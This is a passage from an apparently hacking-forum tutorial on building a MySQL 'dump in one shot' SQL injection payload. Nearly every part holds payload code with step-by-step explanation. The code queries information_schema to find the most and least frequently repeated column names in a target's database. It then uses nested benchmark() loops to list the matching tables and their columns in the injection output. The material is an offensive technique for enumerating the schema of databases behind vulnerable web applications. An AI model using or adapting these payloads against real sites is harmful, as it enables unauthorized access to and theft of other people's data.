#7AC07C">))<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;))<br>&nbsp;&nbsp;)</span><span style="color: #66CCFF">x<br></span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>Let's analyze that code. It is regular DIOS where we initialized few variables where we will store data for:<br><br><span style="color: #FFD700;">@col</span> --&gt; here we will store column name in each iteration within DIOS<br><span style="color: #FFD700;">@col_n</span> --&gt; here we will store count for each column name in tables in each iteration within DIOS<br><span style="color: #FFD700;">@col_max</span> --&gt; here we will store <span style="color: #00BFFF;">number </span>of <span style="color: #32CD32;">most frequently repeated</span> column found so far in tables from primary database<br><span style="color: #FFD700;">@col_max_name</span> --&gt; here we will store <span style="color: #00BFFF;">name </span>of <span style="color: #32CD32;">most frequently repeated</span> column found so far in tables from primary database<br><span style="color: #FFD700;">@tbl_max</span> --&gt; here we will store list of tables they have <span style="color: #32CD32;">most frequently repeated</span> column <span style="font-weight: bold;"><span style="color: #FFA500;">(incrementally compound variable !!!)</span></span><br><span style="color: #FFD700;">@col_min</span> --&gt; here we will store <span style="color: #00BFFF;">number </span>of <span style="color: #32CD32;">least frequently repeated</span> column found so far in tables from primary database<br><span style="color: #FFD700;">@col_min_name</span> --&gt; here we will store <span style="color: #00BFFF;">name </span>of <span style="color: #32CD32;">least frequently repeated</span> column found so far in tables from primary database<br><span style="color: #FFD700;">@tbl_min</span> --&gt; here we will store list of tables they have <span style="color: #32CD32;">least frequently repeated</span> column <span style="font-weight: bold;"><span style="color: #FFA500;">(incrementally compound variable !!!)</span></span><br><br>Let's continue with analyze of our regular DIOS part. We will use <span style="color: #00BFFF;">if()</span>
 function quite a lot. At the beginning of our iteration within DIOS we 
will store name of present column name in actual iteration in variable <span style="color: #FFD700;">@col</span> with:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>Because
 we don't want column name to appear in SQLi output we put that 
assignment inside of if() function resulted with 0x00 in all cases 
(nothing added to output). We will need that name for counting how many 
times that column name exists among all tables in primary database with:<br><br><span style="color: #FF1493;">if(</span> <span style="color: #FFA500;">((@col_n:=(select count(column_name)from information_schema.columns where table_schema=database()<br>and column_name=@col))&gt;=@col_max)</span>, <span style="color: #32CD32;">True</span>, <span style="color: #FF0000;">False</span><span style="color: #FF1493;">)</span><br><br>Number how many times we can find column from local variable <span style="color: #FFD700;">@col</span> (actual column name in present iteration) we store in <span style="color: #FFD700;">@col_n</span> variable. It that number is higher than number stored in <span style="color: #FFD700;">@col_max</span> (number of most frequently repeated column so far) code execution will continue at <span style="color: #32CD32;">True</span> part. Otherwise at <span style="color: #FF0000;">False</span> part.<br><br><span style="font-size: x-large;"><span style="font-weight: bold;"><span style="color: #32CD32;">True part</span></span></span><br><br>We have found new most frequently repeated column so far so we must store data about it.<br><br>With:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">col_max_name</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>we will store the name of most frequently repeated column so far.<br><br>With:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">col_max</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>we will store number how many times that most frequently repeated column occurs.<br><br>Then
 most important part comes. We must store all table names where that 
most frequently repeated column exists. This local variable will be 
composed from iteration to iteration. We will add one table name each 
time to that list with:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">','</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">))&nbsp;<br></span></code></div></div></div><br>In first iteration <span style="color: #FFD700;">@tbl_max</span>
 is still initialized (0x00) so in that case we simply add first table 
name to it (line #2 in code above). In all other cases (see line #3 in 
code above) we concatenate old list <span style="color: #FFD700;">@tbl_max</span> (built so far) with <span style="color: #32CD32;">comma</span> and <span style="color: #32CD32;">latest table name</span> from actual iteration. That way we will compose a list with table names divided with commas like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">config</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">content</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">files</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">images</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">links&nbsp;<br></span></code></div></div></div><br>Why is that needed? Because later we will use that incrementally composed variable for searching with function <span style="font-weight: bold;"><span style="color: #00BFFF;">find_in_set()</span></span>. That function expect a string list composed of substrings separated by comma.<br><br><span style="font-weight: bold;"><span style="color: #FFA500;">That way we stored all data needed for later for most frequently repeated column we have found.</span></span><br><br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FF0000;">False part</span></span></span><br><br>Here we will use few nested if() functions. With code bellow:<br><span style="color: #FF1493;">if(</span><span style="color: #FFA500;"> ((@col_n:=(select count(column_name) from information_schema.columns<br>where table_schema=database() and column_name=@col))&lt;=@col_min and @col_n&gt;1)</span>, <span style="color: #32CD32;">True</span>, <span style="color: #FF0000;">False</span><span style="color: #FF1493;">)</span><br><br>we will store number how many times we can find column from local variable <span style="color: #FFD700;">@col</span> (actual column name in present iteration) in <span style="color: #FFD700;">@col_n</span> variable.<br><br>It that number is lower than number stored in <span style="color: #FFD700;">@col_min</span> (number of least frequently repeated column so far) code execution will continue at <span style="color: #32CD32;">True</span> part. Otherwise <span style="color: #FF0000;">False</span> part will be executed, where we won't do anything (0x00).<br><br>In case we have found new least frequently repeated column so far (<span style="color: #32CD32;">True</span> part) we must store data about it.<br><br>With:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">col_min_name</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>we will store the name of least frequently repeated column so far.<br><br>With:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">col_min</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>we will store number how many times that least frequently repeated column occurs.<br><br>With:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">','</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">))&nbsp;<br></span></code></div></div></div><br>we
 will incrementally (from iteration to iteration) add table name to the 
list of tables where least frequently repeated column exists. Final 
result will be comma separated list with tables like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">config</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">content</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">links</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">Products&nbsp;<br></span></code></div></div></div><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">That way we stored all data needed for later for least frequently repeated column we have found.</span></span><br><br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">#2</span></span></span><br><span style="font-weight: bold;"><span style="color: #FFD700;">Displaying list of tables (with its column names) where most and least frequently repeated columns exists</span></span><br><br>We
 already know we can't use data stored in variables in different dumps 
in one shot syntax. So we can't combine data from different standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>. That is why we will use <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">benchmark based DIOS</span></a> where this is possible.<br><br>For
 displaying of all tables (with its columns), where most and least 
frequently repeated columns exists, we will use double benchmark 
function. First benchmark will be used for displaying of tables, second 
(nested one) for displaying columns from that tables:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">concat<br></span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;</span><span style="color: #FF99FF">'&lt;font&nbsp;color=blue&gt;'</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">nmb</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;if(</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">col_max</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">:=<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">CONCAT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">LPAD</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">nmb</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">nmb</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x30</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">Select&nbsp;concat&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">Database</span><span style="color: #7AC07C">()&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">tbl_x&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">find_in_set</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">)&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">order&nbsp;by&nbsp;table_name&nbsp;LIMIT&nbsp;1</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF99FF">'&lt;div&nbsp;style="margin-left:25px;"&gt;&lt;font&nbsp;color=green&gt;'</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">nmb_c</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;where&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">Database</span><span style="color: #7AC07C">()&nbsp;and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">tbl_x<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">LPAD</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">nmb_c</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">nmb_c</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x30</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)=@</span><span style="color: #66CCFF">col_max_name</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">'&lt;/font&gt;'</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">'&lt;font&nbsp;color=green&gt;'</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">'&lt;/font&gt;'</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">Database</span><span style="color: #7AC07C">()&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">tbl_x&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">clm_x&nbsp;order&nbsp;by&nbsp;column_name&nbsp;LIMIT&nbsp;1<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c62723e<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">clm_out</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FF99FF">'&lt;/div&gt;&lt;/font&gt;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>)&nbsp;<br></span></code></div></div></div><br>In code above most important part is:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">Select&nbsp;concat&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">Database</span><span style="color: #7AC07C">()<br>and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">tbl_x&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">find_in_set</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">order&nbsp;by&nbsp;table_name&nbsp;LIMIT&nbsp;1</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>Here
 we won't display all tables from primary database but only those they 
have most frequently repeated column. We stored such tables in variable <span style="color: #FFD700;">@tbl_max</span>. To show only them we added additional condition to our code:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">find_in_set</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>where we used function <span style="color: #00BFFF;">find_in_set()</span>. There table name from each iteration is searched in comma separated list of tables in <span style="color: #FFD700;">@tbl_max</span>. If table name is found in that list, it is displayed, otherwise not.<br><br>In our second (nested) benchmark (where we display column names for tables from first benchmark) we color output:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">if(&nbsp;(@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)=@</span><span style="color: #66CCFF">col_max_name</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(</span><span style="color: #FF99FF">'&lt;font&nbsp;color=red&gt;'</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">clm_x</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">'&lt;/font&gt;'</span><span style="color: 